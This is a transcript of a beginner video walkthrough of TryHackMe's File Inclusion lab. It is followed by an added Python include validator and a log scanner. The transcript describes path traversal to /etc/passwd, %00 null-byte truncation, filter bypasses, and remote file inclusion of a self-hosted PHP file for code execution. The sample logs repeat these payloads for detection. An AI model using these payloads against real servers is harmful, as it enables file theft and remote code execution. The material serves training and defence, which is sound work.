TryHackMe! File Inclusion - Beginner Friendly Walkthrough

Captions
Hi, and welcome again to another video here on TryHackMe. We're gonna do the room called File Inclusion in this video. It was a viewer's suggestion, and the viewer suggested me to use Burp Suite, particularly about something about a POST HTTP request. Now I'm not sure exactly which it is at the moment, but let's just get started and let's see if we didn't hit it.

So the introduction is basically all about what is file inclusion. It shows you this picture here where it tells you about some domain name that's got some sort of PHP file, in this particular case, and you can see there is a GET parameter, or URL variable, whatever you call it, called file, and it's being equal to usercv.pdf. Now this usercv.pdf is being loaded from somewhere, and in this particular case it's probably something that is on the disk, because there is no http in front of it. Now what can be done in this particular case here is take this query string, all the parameters, whatever we're going to call it, and also the value, for your discretion, and that will then enable you to include something different, let's say any other file that could be interesting to include. So this is what this picture kind of shows you: that instead of usercv you could write something like /var/www/app and then go directly to the application and then load the usercv.pdf anyways. You could also do slash, maybe, or best, ../../, for the ../ is going one back, basically meaning that you are doing a path traversal, so you're going backwards into the file structure that is represented right here. Now I don't know if this is the correct file structure; we're going to check it out. This is a medium room, so it should take something to get it done. I did start the machines, let's just actively click the button.

Why do file inclusion bugs happen? Well, it basically happens whenever the programmer is not validating the input. You should always validate input. It also is not sanitized and not validated, which is of course exactly what happens when you just, you know, include stuff. The risk is basically you can get any file from the hard disk on the server, and of course it depends a lot on which user you are on the server and what kind of rights you get. So we deployed the version machine, as you can see here, and it should be... what is this? Oh, it's different labs. So I guess when we open this page in a new page, let me just close some of this. Yeah, it showed me this, so this is our lab, it would seem. So let's go back to the deploy. So nothing much to say about this deployment.

Path traversal now, we did talk about it already. This is when you do the dot, the periods, you know, period period, but dot dot is easy to see them, period, but this is an actual period, the dot, yeah. So you do ../, then ../, and you go back, and then you try and read something from the /etc folder, for example the passwd file, to see, you know, sometimes you can get actual hashes from it if it's a really lazy admin, but also you can see the users to expect. So I don't know if we need to do something, but what does it talk about? Yeah, it basically just talks about how you should see this in your mind with this image. So, yeah, then if you don't... if this is the particular, I'm going to do this. How are we going to do that? It doesn't seem like it. Hmm, well, no matter, no matter. So it does talk about this function here called file_get_contents, which is a very standard, you know, php.net, isn't it? file_get_contents: you basically see that this is a standard function that reads an entire file and pastes it into... the word entire, it's everything. So you read any file and just basically output that to, well, like any, is it like remote stuff, local stuff, doesn't really matter now. So that is the actual answer to the question down here below, if I'm not mistaken; I've got a pretty quick glance at it, so let me just put it in.

So there's a suggestion here about different places you can try and include to get stuff. Now if you can get the shadow file you will be happy, because then you basically have all the hashes and then you can just start brute forcing. Sometimes, you know, this is also a really interesting path; it doesn't necessarily have to be root, it can be any user, which is why it's really important to get the passwd file, because it has all the registered users that have access to the system in the file. By that you can just replace the root word with different users, sorry, yeah, different users, and then try and look for this particular standard library where the SSH keys are. So let's go to the... yeah, so this is a particular case, it's PHP, we just zoom a bit on this. You can see that it does something like include, and include will also include stuff, but it will include stuff that is reachable from the... how can I tell it? Maybe there's actually a text here saying what I'm looking for, the word, but it will include whatever is reachable. So, and it says something about the PHP code above uses GET requests to include the file from web pages, we call blah blah blah. So yeah, basically anything that is reachable, you know, and I guess that kind of settles that.

So we've got a question here: in lab number one, try and read the /etc/passwd file, what would the request be? So it kind of wants me to add a dot. Is that because... do they... oh, it's because they want me to have it from the... no no no, they don't. lab1.what? That's kind of interesting, what is that dot for? Ah, lab one, oh, it's probably because they want me to add like a whole string thing. So yeah, okay, so lab one, let's just, you know, do a test here, and yeah, and wherever you see stuff like that you notice that it says warning: file inclusion failed to open stream, no such directory. Now we have the path and it says file one equal test, so we can try something like /etc/passwd. I know this is gonna fail. Oh, actually, redirected from the root, interesting. I thought we needed to do something like, you know, ../, but anyways, we got it. So the answer will probably be this, to the actual test. Yeah, the hint was... yeah, it's fine.

So in lab two, what is the directory specified in the include function? I don't see what it means, let me just go and have a look, and I remember doing the POST thing that you asked for; it lets you test again. What is the directory specified in the include? Oh, directory, is it includes they mean? I'm not exactly sure what they wanted to post. Yeah, okay, so yeah, sometimes just gonna read the questions like, what do they mean, because we all understand things differently.

So now I'm gonna go to part number two of local file inclusion. It's got a little bit deeper into LFI, including discussing a couple of techniques to bypass the filter within the include function. Well, in the first cases we checked the code for the web app and blah blah. So in this particular case it looks like... I'm just trying not to read all the text, because, oh yeah, you can include the null byte thing. So if you have some code, for example, that, you know, appends this, which in this case here it does, appends .php, then you can with a null byte kinda, you know, tell it to, you know, ignore it in a way. So that would be looking like this here: just write the normal thing you're gonna write and then percentage zero zero, which is a null byte. Now null byte is something that's gonna take a while to explain, but, you know, it is basically just a way for the file system, or this file descriptor, to stop reading, and it's gonna, you know, just end up with unpredictable results, and that's probably his way to say it, or ignore the rest, this could be a way to say it. So I guess, yeah, also sometimes you have to do double slashes because there's some, you know, function looking for slashes or something, you know, there's a lot of different cases and it doesn't cover all of them here, but, you know, some of them are mentioned that are really good.

So try out lab five... but doesn't it say lab three first? Let me... I think I'm gonna stick to answering the questions because I'm not really sure. In lab three, try to read /etc/passwd, what does the request look like? So it wants you to do this lab3.whatever and then ../../. So let's just go to lab three, just write test, and then the top here, and we're going to do something like that on slashes, as I said, and then /etc/passwd and then percentage zero zero, and in this particular case we got it again. If we remove the null bytes in the bottom, you know, we're not gonna get anything, so we need the null byte, as you can see. So the answer to all of this is gonna be that. All right, so which function is causing the directory traversal in lab number four? So let's go to lab four, write test one more time, and this is file_get_contents, it would seem, in this particular case. So let's go and paste it in.

You know, try out lab six, check what is the directory that has to be in the... what? Fly, go away. Try out lab 6 and check what is the directory that has to be... it doesn't make sense right now, I'm not really tired. So lab six, it did. All right, so no, test one more time: access denied, allows files at the THM-profile folder only. So obviously you can understand this question one more time: try out lab 6 and check what is the directory that has to be in the input field. What is the directory? It has to be THM-profile, it kinda said it right there. Oh, I'm gonna stick with this, it seems like that is the answer, I don't know. Yeah, okay, try out lab 6 and read /etc/os-release, what is the version ID? So I don't know what they're probably gonna hint, but, oh yeah, yeah, we know that. So let's take... I'm not really sure what's right here, but we could try something like, you know, ../ and just press enter. We can also try to add the null byte just to try all, you know, arsenal. And this has access denied and allows files at the THM-profile folder only, so we could probably put that in front, I assume, and then by putting that in front of it, it kind of, you know, this is a code thing, you know, and if you're a programmer you should probably see the code in front of you right now: that is kind of like an if statement, if the first argument of this file value is this particular name then boom, you have it. So the version is 12.40.

All righty, so now we have remote file inclusion. Is that just a real thing? It's a real thing. So remote file inclusion is basically the same, you know, I guess this picture should do it. So we do something like that, you know, it's being read from the, you know, remote... some HTTP service, you know, web server, whatever, and whatever is inside the file called cmd.txt, you know, it's going to be interpreted, you know, in this particular case with this code, and the machine will read it, and because it's PHP it will allow that. This is going to be probably executed in this particular case; that's really bad. So now that we read something about this, let's go to task number seven. Is there anything more to do? Oh yeah, there's a challenge, okay, really good. So remediation as developer, so it kind of tells you what to do, and I think that is for you to read, not really me, because I'm not a developer, but I have been; I just quit it many years ago because I got tired of the same task over and over again. So great job, now that you have the technique you learned blah blah.

So let's see, capture the flag, capture the flag at /etc/flag1, but make sure you have the VM attached, okay. Oh, it's just... let me just open this then. So we got some challenges. Oh, that is quite confusing, let me just put it right here. So challenge number one, this is a POST parameter; number two, okay; and number three, and I don't know which challenge this is for, questions. Anyways, let's assume that... let's assume that, I'm not sure, let's, I don't know, let me just check this here. Let's post this, superb. So I use FoxyProxy, by the way, I installed this, so I direct all traffic to Burp, and then I have Burp open already, you know, I just press intercept on, and then I capture something like test, it's being posted into Burp in this particular case, and you can see that this is, you know, if funny, it's a GET request. So let's just add this to the repeater so we save it, and forward the next one here, and this next part I'm not really sure, but it's something to Google, so I'll just forward this, and I want to repeat it. It kinda gave us a GET request. Now can I assume on this, just a chat would be really good. Doesn't look like it, project options, but, oh wow, no, user options, configuration library, I don't want to zoom on this, so I'm just gonna, for the sake of this video, just, you know, copy-paste it out, and this is a GET request, but it's not a POST request, just to be clear about this. So what does it say? The input form is broken, you need to send POST requests with file parameters, and it does seem like it's also broken in the HTML. So what I really want to do is just open the, you know, inspector pretty fast, I can zoom at that, and then, you know, press anywhere just to get focused, and then you can basically just alter this to POST, you know, it doesn't really... that's about it, I guess. So we could just take this /etc/flag1 here, and just for the sake of Burp let's go back to that, and intercept on, and say include, and now you see that since we changed it, we got a perfectly, you know, configured POST request. Listen, that's the repeater, forward, rest. We kind of got the flag there, so let me just take this and paste it in. That's the first one.

I kinda assume that this is on challenge number three, oh yeah, okay, so it says playground, okay, so this is probably challenge number two then. So this particular example, we just captured the request and didn't really do anything with it, but we could have. If you wish to see the difference, you copy-paste out, you know, I'm just going to do this for you now, and, no, so this copy-pasting is really difficult sometimes, come on, please, thank you. This is the POST request now. As you see, when I change it, it's more than the bottom and top that is different; it is the same, but the value, the value is being put down in the bottom, when it's supposed to... question, you change that to POST, that's really it, you know, that's how the POST request is created. There's nothing in all the other headers that does it; they are created to a POST request, so that is just the way to do it.

So we're going to go back to challenge number two, and it says welcome guest, and so I'm gonna check my cookies, as the hint said, just to get this part done, and go to storage, and we can see that it says guest as a value. Now if I write, for example, admin here, I'm just assuming it's something stupid, so, kind of, yeah, so I have it right here and this is welcome admin. Now I was not really sure what I wanted to do; you want me to read the /etc/flag, so it is basically somewhere we got some value we can edit, and I'm waiting to see what we have here, just pretty fast. So that's it, this is the only thing we have, and it says include, filter stream, search file directory, and that is because the challenge number two PHP file on line number 37 is trying to include. So if I change this to that and update it, it directly says includes /etc/flag whatever. So if I, for example, put... just trying to put something on top, now I have two slashes, just a second, there we go, can I please get it, thank you. Now we deleted that, it says that it appends this .php there, so we can see we need null bytes. So, yep, and now that is fixed, and then we have an includes, not really sure if it means... we could try a few more, and now that we have it, we got the flag. So we post it.

And now we're gonna capture the flag on number three, which is website user request to access, and request is a method in PHP that is both GET and POST and PUT and whatever, it's everything. So we're gonna try and get this flag from lab number three, so let's go and check it out. So let's just put in whatever value you need and say... so this is the value you put in, and it's basically... let me try two slashes now, and it removes it. So let's just try a lot of slashes just to see if there's any difference at all. No, so it would seem that we need some sort of other way of accessing this particular file on this. So I suggest we're gonna do the same thing here, we just take the request, record it with Burp, it's always good to record with Burp, and just send it. This is a request, it's being sent as a GET request, so I sent that to repeater, and it doesn't matter, and I'm not really sure if we need to do this. The thing with the request method is that it's gonna try and get the value, whatever we have. So let me just alter this to POST, let's see: warning, it's difficult to see, but if I can render, yeah, we can see that we got the PHP and what a lot of slashes there are right there, and something else wrong here. What is this? I think I'm just gonna close them all now, just started always, because I think there's some tests. Sent this, my mouse is having a little issue with drivers. So we see send to repeater, forward, doesn't matter, this is the repeater, it's flag number two cookie, that's odd. Oh yeah, I remember that, that's something we did because it saved the... it remembers the cookie value from earlier here, so I guess we can just ignore that for now. So what I kind of suspect is that we're gonna write POST here. Let me just, you know, take this to a bigger screen and then basically just append the ../ that says that it's in smash, and then do the /etc/flag3, and then do the null byte. This is what I suspect it's all about. I'll just post that in and send it and render, and it kind of didn't do it in this particular case. Yeah, so what we kind of forgot here is that this is a POST request, so we're going to take the value down here, I'm putting it at the bottom, this is just how POST works, you don't need to have that question mark anymore, and then send it one more time, and not really sure, we didn't get an error or anything, no errors. So what we could try now is to append on the extra double... as amazing sometimes, you remove, like having extra slashes, that could be a case here, and also double dots, you know, in a way, and just trying to see if this is gonna give you anything different. Sometimes it works, other times it is... this serious, is it zero? So let me just do more slashes, see if we can get something. It doesn't really seem to be eating that either. So what I suspect now is that we're just gonna, you know, ditch this request here and then go to the lab, open inspector, zoom a bit, pick the form and just alter it again to POST, but I still have a pretty big hunch that this is a request thing. Let's do test, record the request, add this to repeater and just skip it from there, and we don't need this cookie. So what we're gonna do here is basically /etc/flag3 and then a null byte, and it gave me something different this time, so we got a flag. So sometimes it is just better to change it directly compared to trying to, you know, copy it. Copy it, that's enough.

Yeah, and then the last one here is gain remote code execution in the playground, so let's go, and there you go. All right, so we are to finish the last part here on the last task, and as you can see I already answered it with the flag, because yesterday night I had to break the video up in two, and it was very... the last one, and it was just very inconvenient, but it is the way it is. So the way we're gonna get this remote code execution is, if you remember, we read before something about hosting a file with PHP code on our own server, which basically resolves to starting up a Python server on our machine. So what I'm talking about is basically, it's actually still running there, that we create a file called whatever, like test.txt, with some PHP code in it. We are tasked to execute a command that will give us the hostname, and in PHP that is the exec hostname, and this is the script we have saved in a text file, as you can see. Now what we're going to do is host it just directly on our machine with Python, for example, so we have a website running, and then we can basically just go to the lab and say http:// and write the IP address of your own machine, and this is the file name, and when I press enter now you will see that we include whatever file with the code, and we execute some code on it, and this is how we get the flag. So basically you read about that in the, I think it was remote file execution, remote file inclusion, sorry, where you had this sort of thing here talking about you could host something on, well, basically anywhere, but it is just easier to host on your own machine while hacking on TryHackMe because you have Python there already on Linux Kali, and that kind of gives you this advantage.

So remote and local file inclusion is basically all about knowing the file system structure and verifying what kind of... I think this is the picture, verifying you access downwards in the system, what can you get from the system, what you can grasp. And remote file execution is the one here where you try to include something remotely into the actual server that you are trying to attack. In this particular case it was PHP, and PHP is really easy to misuse because it's such an easy language to execute commands on, because of the way it's being coded: it's an interpreted language, a script language, it is not something to compile, for example, so there's many things you can do as opposed to other languages. But I guess this is just for this video, and once again I just really hope you liked the video, and thank you for the shout-out, you that told me to do this video on Facebook; in respect to privacy I don't mention any names, but thank you, I did it, it was a fun room. If any of you got some more rooms that you want me to do, just give me a shout-out and I will look at it. So next time, have a really nice day, bye.
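The video leaves the "remediation as developer" task to the viewer. As an added example (not code from the video or from the TryHackMe room), here is the check a PHP-style include should run on the file parameter before calling include() or file_get_contents(), covering the cases the walkthrough tries: an absolute /etc path, ../ traversal, the %00 null byte that cuts off an appended .php, the ....// double-dot variant, the THM-profile prefix trick, and a remote http:// URL. The same check is then run over constructed access-log lines to flag which requests a defender should be alerted on. BASE_DIR, ALLOWED_EXT and the log lines are assumptions made up for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical allow-listed directory and extensions (assumptions, not values from the room).
BASE_DIR = "/var/www/app/profiles"
ALLOWED_EXT = {".pdf", ".txt"}


def check_include(user_value, base_dir=BASE_DIR):
    """Validate a user-supplied file name before it reaches include() or file_get_contents().

    Returns (resolved_path, reason); resolved_path is None whenever the value is rejected.
    """
    value = unquote(user_value)  # decode once, as the web server does before PHP sees it
    if "\x00" in value:  # the %00 trick that cuts off an appended ".php"
        return None, "null-byte"
    if re.match(r"[a-z][a-z0-9+.-]*://", value, re.IGNORECASE):  # http://, ftp://, any wrapper
        return None, "remote-scheme"
    # Canonicalise relative to base_dir. An absolute value such as /etc/passwd replaces
    # base_dir inside join(), and ../ sequences (including a THM-profile/../.. prefix)
    # are collapsed by normpath(), so one commonpath() test catches both after normalisation.
    # The ....// variant only defeats a filter that strips "../" once; here it is just a
    # nonexistent subdirectory inside base_dir and falls through to the extension check.
    candidate = posixpath.normpath(posixpath.join(base_dir, value))
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        return None, "traversal"
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None, "bad-extension"
    return candidate, "ok"


# Constructed access-log lines imitating the requests tried in the video (not real server logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Aug/2022:10:00:01] "GET /lab1.php?file=usercv.pdf HTTP/1.1" 200',
    '10.0.0.5 - - [09/Aug/2022:10:00:02] "GET /lab1.php?file=/etc/passwd HTTP/1.1" 200',
    '10.0.0.5 - - [09/Aug/2022:10:00:03] "GET /lab3.php?file=../../../../etc/passwd%00 HTTP/1.1" 200',
    '10.0.0.5 - - [09/Aug/2022:10:00:04] "GET /lab5.php?file=....//....//etc/os-release HTTP/1.1" 200',
    '10.0.0.5 - - [09/Aug/2022:10:00:05] "GET /playground.php?file=http://10.0.0.5:8000/cmd.txt HTTP/1.1" 200',
]

FILE_PARAM = re.compile(r'[?&]file=([^\s&"]+)')


def scan_log(lines):
    """Return (raw value, reason) for every logged request whose file= parameter would be rejected."""
    findings = []
    for line in lines:
        match = FILE_PARAM.search(line)
        if match:
            resolved, reason = check_include(match.group(1))
            if resolved is None:
                findings.append((match.group(1), reason))
    return findings


if __name__ == "__main__":
    for raw, why in scan_log(SAMPLE_LOG):
        print(f"{why:14s} {raw}")
```

Because the check canonicalises first and only then compares against BASE_DIR, it does not depend on spotting any particular spelling of "../", which is exactly what the strip-once filters in the labs get wrong.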
Info
Channel: Security in mind
Views: 9,583
Keywords: File Inclusion, local file inclusion, penetration testing, cyber security, web app testing, local file inclusion attack tutorial, file inclusion, local file inclusion explained, local file inclusion vulnerability, linkedin e learning, udemy wordpress, codecademy, udacity, sans institute, linkedin learning
Id: Ajd0I9CLhiQ
Length: 39min 59sec (2399 seconds)
Published: Tue Aug 09 2022